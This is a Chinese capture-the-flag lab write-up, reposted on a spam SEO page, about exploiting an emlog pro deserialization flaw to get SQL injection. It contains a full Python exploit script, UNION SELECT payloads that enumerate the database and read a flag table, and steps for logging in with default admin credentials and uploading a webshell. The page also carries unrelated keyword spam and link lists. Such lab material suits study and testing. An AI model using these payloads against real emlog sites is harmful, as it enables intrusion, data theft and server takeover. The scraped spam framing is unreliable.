当前位置: 首页 > news >正文

淘宝客优惠券网站建设加盟官网做直播平台网站赚钱吗

淘宝客优惠券网站建设加盟官网,做直播平台网站赚钱吗,动易网站后台管理功能,软件开发 网站开发公司靶场介绍 emlog是一款轻量级博客及CMS建站系统#xff0c;在emlog pro v.2.1.15及更早版本中的不受信任数据反序列化允许远程攻击者通过cache.php组件执行SQL语句。 不感兴趣的可以直接拉到最后面#xff0c;直接获取flag 备注#xff1a;没有通过sql注入获取到flag…靶场介绍 emlog是一款轻量级博客及CMS建站系统在emlog pro v.2.1.15及更早版本中的不受信任数据反序列化允许远程攻击者通过cache.php组件执行SQL语句。 不感兴趣的可以直接拉到最后面直接获取flag 备注没有通过sql注入获取到flag但是通过其他方法获得了如果有大佬通过sql注入获取flag请告诉我。 开启靶场 搜索POC该POC是执行user()函数 import requests import sys import time requests.packages.urllib3.disable_warnings()url http://eci-2ze5lrqt8xe7n32hn1rm.cloudeci1.ichunqiu.com session requests.session() proxy {http: 127.0.0.1:8080, https: 127.0.0.1:8080 }# Step1 注册一个账户并登录获取token def step1():url_register /admin/account.php?actiondosignupdata_register {mail:9a6d0oLtest.com,passwd:password,repasswd: password}session.post(urlurl_register, datadata_register, verifyFalse, allow_redirectsFalse, proxiesproxy)url_login /admin/account.php?actiondosigninsdata_login {user: 9a6d0oLtest.com,pw: password}res session.post(urlurl_login, datadata_login, verifyFalse, allow_redirectsFalse, proxiesproxy)if res.status_code ! 302 or res.headers.get(Location) ! ./:print(登录错误)exit()url_token /admin/article.phpres session.get(urlurl_token, verifyFalse, allow_redirectsFalse, proxiesproxy)while res.status_code ! 200: # 因为该cms会随机进行重新的身份认证详见include/service/user.php:106res session.get(urlurl_token, verifyFalse, allow_redirectsFalse, proxiesproxy)global tokentry:token res.text.split(idtoken value)[1].split()[0].strip()except:token # Step2 新建两篇文章设置两篇文章的alias写入payload def step2():url_article /admin/article_save.php?actionautosavedata_article {logcontent: time.time(), logexcerpt: , title: time.time(), cover: , alias: time.time(), sort: -1, postdate: 2022-10-16 00:01:34, date: , tag: , top: n, sortop: n, allow_remark: y, password: , token: token, ishide: y, as_logid: -1}# 新建第一篇文章res session.post(urlurl_article, datadata_article, verifyFalse, allow_redirectsFalse, proxiesproxy)while res.status_code ! 200:res session.post(urlurl_article, datadata_article, verifyFalse, allow_redirectsFalse, proxiesproxy)try:id_1 res.text.split(:)[1].split(_)[0]except:print(error请手动删除当前用户所有文章以及草稿再重新运行此poc.)exit()# 新建第二篇文章data_article[logcontent] time.time()data_article[title] time.time()data_article[alias] time.time()res session.post(urlurl_article, datadata_article, verifyFalse, allow_redirectsFalse, proxiesproxy)while res.status_code ! 200:res session.post(urlurl_article, datadata_article, verifyFalse, allow_redirectsFalse, proxiesproxy)try:id_2 int(res.text.split(:)[1].split(_)[0])except:print(error请手动删除当前用户所有文章以及草稿再重新运行此poc.)exit()# 更改第二篇文章的alias# payload ;s:87:0 union select 1,user(),1,,,,,1,-1,blog,1,1,0,n,n,n,y,y,,,#;s:1:Ypayload ;s:93:0 union select 1,user(),1,,,,,1,-1,blog,1,1,0,n,n,n,y,y,,,,,#;s:1:Ydata_article[as_logid] id_2print (id_2)if id_2 10:data_article[alias] payloadif id_2 10:data_article[alias] payload[1:]if id_2 100:# data_article[alias] ;s:81:0 union select 1,user(),1,,,,,1,-1,blog,1,1,0,,,,y,,,,#;s:1:Ydata_article[alias] ;s:87:0 union select 1,user(),1,,,,,1,-1,blog,1,1,0,,,,y,,,,,,#;s:1:Yres session.post(urlurl_article, datadata_article, verifyFalse, allow_redirectsFalse, proxiesproxy)while res.status_code ! 200:res session.post(urlurl_article, datadata_article, verifyFalse, allow_redirectsFalse, proxiesproxy)# 更改第一篇文章的aliasdata_article[as_logid] id_1data_article[alias] ?php exit;//res session.post(urlurl_article, datadata_article, verifyFalse, allow_redirectsFalse, proxiesproxy)while res.status_code ! 200:res session.post(urlurl_article, datadata_article, verifyFalse, allow_redirectsFalse, proxiesproxy)# Step3 访问触发反序列化以及sql注入 def step3():headers {X-Rewrite-Url: /Y,}res session.get(url, headersheaders, verifyFalse, allow_redirectsFalse, proxiesproxy)if res.status_code 200:print(res.text.split(title)[1].split(/title)[0])else:raise Exceptionif __name__ __main__:try:step3()except:step1()step2()step3()将脚本挂上代理 step1() //注册用户 step2() //写入payload step3() //执行脚本 操作步骤 打开burp 挂上代理 注册包全部放通只保留这个数据包 step2() 保留第二个数据包 step3() 执行SQL语句 通过脚本可以获取到执行的命令 寻找flag位置 将URL编码转换后可以发现他的语句是这样的 0 union select 1,user(),‘1’,‘’,‘’,‘’,‘’,1,-1,‘blog’,1,1,0,‘n’,‘n’,‘n’,‘y’,‘y’,‘’,‘’,‘’,‘’,‘’# 然后我们替换user()即可。 0 union select 1,concat(0x7e,(SELECT CONCAT(TABLE_SCHEMA,‘-’,TABLE_NAME, ‘-’,COLUMN_NAME) FROM information_schema.COLUMNS WHERE COLUMN_NAME ‘flag’ LIMIT 0,1),0x7e),‘1’,‘’,‘’,‘’,‘’,1,-1,‘blog’,1,1,0,‘n’,‘n’,‘n’,‘y’,‘y’,‘’,‘’,‘’,‘’,‘’# 然后数一下前面有你总共输入了多少个字符例如上面一共是235个字符 存在flag 靶场有3处存在flag列 将limit处修改为 limit 2.1 得知存在flllllaaaag表并且在emlog数据库中然后编写payload 0 union select 1,concat(0x7e,(select CONCAT(id, ‘-’,flag) from flllllaaaag),0x7e),‘1’,‘’,‘’,‘’,‘’,1,-1,‘blog’,1,1,0,‘n’,‘n’,‘n’,‘y’,‘y’,‘’,‘’,‘’,‘’,‘’# 结果提示 Illegal mix of collations for operation ‘UNION’ 获取flag 有点生气然后气了一下 登录admin 密码 admin123 这里可以下载数据库备份 查看文件的最后 总结 我太菜了不知道sql报错怎么解决有大佬看到这里希望可以研究一下有成果联系我感谢感谢。 如果对你有用请不要取关哦感谢感谢。 获取shell 在看sql文件时发现这里可以修改运行上传的文件类型 在页面修改时修改为php会自动修改为X这里上传SQL备份后不会改变。 直接上传webshell 获取shell 查看配置文件为 不活心可能是不存在flag。
http://www.pierceye.com/news/355860/

相关文章:

  • 网页网站原型图占位符怎么做公司宣传策划方案
  • 企业网站颜色选择wordpress自然志下载
  • 介绍几个网站重庆网站建设微信开发
  • wordpress小工具跟随最新外贸seo
  • 网站域名的密码电子商务网站策划书3500字
  • 2008 iis 添加 网站 权限设置权限网站开发工程师题
  • 公司域名查询网站网页设计工具软件有哪些
  • 毕业设计网站建设选题依据设计公司网站应该包括的信息
  • wordpress 仪表板主题seo网站排名厂商定制
  • 网站建设成本报表wordpress缺点
  • 外贸建站选择哪个服务器好免费自动生成二维码
  • 建设部申请自己网站c 做网站设计
  • 软件制作网站网站维护合同模板
  • 那家财经网站做的好陕西网站建设公司哪有
  • 淄川网站建设中小型企业网站建设
  • phpcms 投资 网站源码wordpress主题网站
  • 聊城网站托管义乌外贸公司联系方式
  • 开发一个小程序对网站做综合搜索引擎优化分析
  • 网站开发自学网有哪些企业可以做招聘的网站有哪些
  • 网站怎么做百度推广网站开发者模式
  • 学校网站设计制作目的做网站推广方法
  • wordpress建站云平台小程序商城开发平台
  • pc网站转换成微网站网站建设开发哪家质量好
  • wordpress网站使用教程aspnet东莞网站建设多少钱
  • 网站地图提交给百度证券公司如何拉客户
  • 做外贸有哪些免费的网站win7优化大师好不好
  • 网站功能怎么写上海网站制作建设怎么样
  • 网站域名是网站架构吗成都网站搭建优化推广
  • 自己做的网站添加交费功能合肥有什么好的网站建设公司好
  • 做网站品牌龙岩新增病例行动轨迹